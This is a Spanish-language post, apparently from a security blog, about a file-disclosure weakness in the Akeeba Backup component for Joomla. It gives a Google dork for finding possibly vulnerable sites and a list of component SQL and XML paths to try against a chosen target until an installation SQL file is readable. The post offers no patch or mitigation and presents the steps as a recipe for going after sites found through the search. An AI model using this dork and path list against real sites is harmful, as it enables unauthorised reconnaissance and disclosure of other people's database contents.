Joomla Akeeba Backup Components 6.3.3 | Divulgación de la base de datos

Joomla Akeeba Backup Components 6.3.3 | Divulgación de la base de datos

Akeeba Backup Core es el componente de copia de seguridad de código abierto más utilizado para Joomla! CMS. Su misión es simple: crear una copia de seguridad del sitio que se pueda restaurar en cualquier servidor compatible con Joomla, Lo que lo hace ideal no solo para las copias de seguridad sino también para las transferencias de sitios o incluso para implementar sitios en los servidores de sus clientes. Akeeba Backup crea una copia de seguridad completa de su sitio en un solo archivo.

El archivo contiene todos los archivos, una instantánea de la base de datos y un instalador similar en función al estándar Joomla! instalador El proceso de copia de seguridad y restauración se alimenta con AJAX para evitar los tiempos de espera del servidor, incluso con sitios grandes. Alternativamente, puede hacer una copia de seguridad solo de su base de datos, o solo de sus archivos. Akeeba Backup es la solución de copia de seguridad de código abierto confiable, fácil de usar para su sitio.

Buscar sitios Vulnerables.

Para buscar sitios vulnerables, utilizamos el siguiente Dork:

[*] Dork: inurl:»/administrator/components/com_akeeba/»

Con un total de 3140 sitios los cuales pueden ser vulnerables.

 

Explotación de la Vulnerabilidad.

Una vez tengamos un sitio «objetivo» como:

h**p://www.***.com/sites/stop/administrator/components/com_akeeba/akeeba.xml

Debemos utilizar una de las siguientes «exploits» en la URL del sitio a modo de «BruteForce». Es decir, solo debemos remplazar la URL.

  • /administrator/components/com_akeeba/sql/common/mysql.xml
  • /administrator/components/com_akeeba/sql/common/postgresql.xml
  • /administrator/components/com_akeeba/sql/common/sqlsrv.xml
  • /administrator/components/com_akeeba/sql/install/mysql/install.sql
  • /administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
  • /administrator/components/com_akeeba/sql/install/sqlazure/install.sql
  • /administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  • /administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
  • /administrator/components/com_akeeba/sql/updates/mysql/3.5.0-[YEAR]-[MONTH]-[DAY].sql
  • /administrator/components/com_akeeba/sql/updates/mysql/3.5.0-2012-03-27.sql
  • /administrator/components/com_akeeba/sql/updates/mysql/3.6.0-2012-07-31.sql
  • /administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-[YEAR]-[MONTH]-[DAY].sql
  • /administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-2012-03-27.sql
  • /administrator/components/com_akeeba/sql/updates/sqlazure/3.6.0-2012-07-31.sql
  • /administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-2012-03-27.sql
  • /administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-[YEAR]-[MONTH]-[DAY].sql
  • /administrator/components/com_akeeba/sql/updates/sqlsrv/3.6.0-2012-07-31.sql

después de estar realizando varias pruebas, accedemos al archivo instal.sql en texto plano.

 

Vulnerabilidad descubierta por: KingSkrupellos
Instituto de Ciberseguridad. Todos los derechos reservados.
X
Ir a la barra de herramientas